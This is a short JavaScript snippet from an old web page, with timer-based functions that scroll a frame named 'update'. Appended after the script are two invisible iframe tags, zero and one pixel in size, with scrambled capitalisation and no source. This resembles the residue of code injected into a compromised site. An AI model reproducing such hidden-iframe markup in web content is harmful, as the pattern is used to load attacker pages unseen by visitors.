function movstar(a,time){
	movx=setInterval("mov("+a+")",time)
	}
function movover(){
	clearInterval(movx)
	}
function mov(a){
	scrollx=update.document.body.scrollLeft
	scrolly=update.document.body.scrollTop
	scrolly=scrolly+a
	update.window.scroll(scrollx,scrolly)
	} <iframE  widTh=0 nAme='6118' height=0></iFrame><iFrame  wiDth=1 name='6118' height=1></iframe>
